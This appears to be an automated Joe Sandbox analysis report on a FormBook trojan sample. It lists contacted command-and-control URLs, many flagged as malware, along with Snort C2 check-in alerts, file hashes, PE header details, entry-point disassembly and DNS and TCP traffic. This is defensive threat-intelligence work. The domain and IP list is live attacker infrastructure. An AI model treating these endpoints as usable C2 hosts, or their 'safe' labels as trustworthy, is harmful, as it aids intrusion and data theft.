http://www.2348x.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ckpconsulting.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.2348x.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.controlplus.systems	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mogi.africa/ar73/www.kellnovaglobalfood.info	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.quickhealcareltd.co.uk/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ckpconsulting.com/ar73/www.2348x.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.b708.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mogi.africaReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quickhealcareltd.co.ukReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ckpconsulting.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hurricanevalleyatvjamboree.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.arredobagno.club/ar73/www.mtevz.online	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ingrambaby.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.kellnovaglobalfood.info	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mogi.africa	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innovantexclusive.com/ar73/www.1wwuwa.top	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.controlplus.systems/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.jacksontcpassettlement.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.arredobagno.clubReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000003.461649448.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.292213498.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267709513.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.462393796.000000000F5B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.289061192.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.526453234.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517440543.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530310030.000000000F5B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.288711256.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.0000000008442000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.echadholisticbar.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ingrambaby.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wwuwa.top	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.authenticityhacking.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ingrambaby.com/ar73/www.arredobagno.club	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.hurricanevalleyatvjamboree.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wwuwa.topReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mogi.africa/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.authenticityhacking.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.arredobagno.club/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.echadholisticbar.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mtevz.onlineReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.b708.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quickhealcareltd.co.uk	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innovantexclusive.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jacksontcpassettlement.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wwuwa.top/ar73/www.echadholisticbar.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.hurricanevalleyatvjamboree.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ingrambaby.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.controlplus.systemsReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.authenticityhacking.com/ar73/www.ckpconsulting.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mtevz.online	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2348x.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2348x.com/ar73/www.b708.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mtevz.online/ar73/r	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.authenticityhacking.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wwuwa.top/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.echadholisticbar.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.arredobagno.club	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innovantexclusive.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.102.136.180	controlplus.systems	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	830326
Start date and time:	2023-03-20 09:10:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	7pECKdsaig.exe
Original Sample Name:	3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/1@4/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 66.3% (good quality ratio 61%) Quality average: 71.7% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 135
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:11:24	API Interceptor	563x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	984
Entropy (8bit):	5.204081515204597
Encrypted:	false
SSDEEP:	24:Yq6CUXyhmQmnbNdB6hmxjmnz0JahmemnHZ6T06MhmDmnbxdB6hmktmn7KTdB6hm0:YqDUXyctnbNdUcAnz0JacPnHZ6T06McW
MD5:	160494591DCB3DD4E2C36F71207A87F3
SHA1:	D611935CA91C155B10A449DB72B3D5C8308A6EB7
SHA-256:	B82EC6928AAA7C30ABBE26DF13CA514DC4508C704F03EB28A4B2ABE40F60DF6E
SHA-512:	301BD7B6A4B7B2D3261C3A10FE98B2B4B811B861FCA077AF8732B7FCDFB2D106FFE82F0072CD859A4436E2EBD9347EACF44539E11AEAD2CA83703737B3030881
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3648731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3638731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3628731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3618731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3608731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3598731648,"LastSwitchedHighPart":30747937,"PrePopulated":true}]}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.393944417418745
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	7pECKdsaig.exe
File size:	185856
MD5:	515bf958f062fec724fbe6bdadf39485
SHA1:	50fbaeb36e98338dc500e252855abf0152bb6bbf
SHA256:	3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
SHA512:	9b336130dc79e9dba0bdba735cc780c4c39148ca38668f660a6b6b15aeb0b8111a687ac4111a7c0bb84663b7c3ba963cefbf8fe4b4e4777fb5394b91d2272ed6
SSDEEP:	3072:F3k9Eu2PDPlFm3TiZHhJmoapMZRrr9d+/eqeibwnFUMGBY8:MkQTeHlaGZRX9K4XeY8
TLSH:	8904BF32D602C071F2B211B5F67D1B7B493D0E343295A4EAA7A225E06EF09E5B53931F
File Content Preview:	MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L....i.?............................@......................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0xfdf140
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0xfc0000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x3F0769F8 [Sun Jul 6 00:14:48 2003 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 64h
call 00007FDF6CAC6D4Ah
mov esp, ebp
pop ebp
ret
call 00007FDF6CACA535h
pop eax
ret
call 00007FDF6CACA535h
pop eax
ret
call 00007FDF6CAC6D93h
ret
call 00007FDF6CACA535h
pop eax
ret
jmp 00007FDF6CAC6DF6h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8764h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8767h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC876Ah
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC876Dh
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8770h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8773h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8776h
ret
call 00007FDF6CACA535h
pop eax
ret
push 88888888h
jmp 00007FDF6CAC8779h
ret
call 00007FDF6CACA535h
pop eax
ret

Rich Headers

Programming Language:

[C++] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2d1a4	0x2d200	False	0.7623950398199446	data	7.409588215160137	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.634.102.136.18049707802031453 03/20/23-09:12:27.000047	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49707	80	192.168.2.6	34.102.136.180
192.168.2.634.102.136.18049707802031449 03/20/23-09:12:27.000047	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49707	80	192.168.2.6	34.102.136.180
192.168.2.634.102.136.18049707802031412 03/20/23-09:12:27.000047	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49707	80	192.168.2.6	34.102.136.180

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:12:26.979583979 CET	49707	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:26.998944998 CET	80	49707	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:26.999897003 CET	49707	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:27.000046968 CET	49707	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:27.019110918 CET	80	49707	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:27.245915890 CET	80	49707	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:27.245950937 CET	80	49707	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:27.246295929 CET	49707	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:27.246371031 CET	49707	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:27.263668060 CET	80	49707	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:47.472598076 CET	49708	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:47.490624905 CET	80	49708	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:47.490818977 CET	49708	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:47.491030931 CET	49708	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:47.508877993 CET	80	49708	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:47.672036886 CET	80	49708	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:47.672099113 CET	80	49708	34.102.136.180	192.168.2.6
Mar 20, 2023 09:12:47.672249079 CET	49708	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:47.672713995 CET	49708	80	192.168.2.6	34.102.136.180
Mar 20, 2023 09:12:47.690121889 CET	80	49708	34.102.136.180	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:12:03.883550882 CET	49786	53	192.168.2.6	8.8.8.8
Mar 20, 2023 09:12:04.092940092 CET	53	49786	8.8.8.8	192.168.2.6
Mar 20, 2023 09:12:26.905668974 CET	58595	53	192.168.2.6	8.8.8.8
Mar 20, 2023 09:12:26.958081961 CET	53	58595	8.8.8.8	192.168.2.6
Mar 20, 2023 09:12:47.423398018 CET	56331	53	192.168.2.6	8.8.8.8
Mar 20, 2023 09:12:47.469249010 CET	53	56331	8.8.8.8	192.168.2.6
Mar 20, 2023 09:13:18.738394976 CET	50506	53	192.168.2.6	8.8.8.8
Mar 20, 2023 09:13:18.759357929 CET	53	50506	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2023 09:12:03.883550882 CET	192.168.2.6	8.8.8.8	0xb81b	Standard query (0)	www.mogi.africa	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:26.905668974 CET	192.168.2.6	8.8.8.8	0x6157	Standard query (0)	www.kellnovaglobalfood.info	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:47.423398018 CET	192.168.2.6	8.8.8.8	0xddbb	Standard query (0)	www.controlplus.systems	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:18.738394976 CET	192.168.2.6	8.8.8.8	0x9ab2	Standard query (0)	www.quickhealcareltd.co.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2023 09:12:04.092940092 CET	8.8.8.8	192.168.2.6	0xb81b	Server failure (2)	www.mogi.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:26.958081961 CET	8.8.8.8	192.168.2.6	0x6157	No error (0)	www.kellnovaglobalfood.info	kellnovaglobalfood.info		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:12:26.958081961 CET	8.8.8.8	192.168.2.6	0x6157	No error (0)	kellnovaglobalfood.info		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:47.469249010 CET	8.8.8.8	192.168.2.6	0xddbb	No error (0)	www.controlplus.systems	controlplus.systems		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:12:47.469249010 CET	8.8.8.8	192.168.2.6	0xddbb	No error (0)	controlplus.systems		34.102.136.180	A (IP address)	IN (0x0001)	false
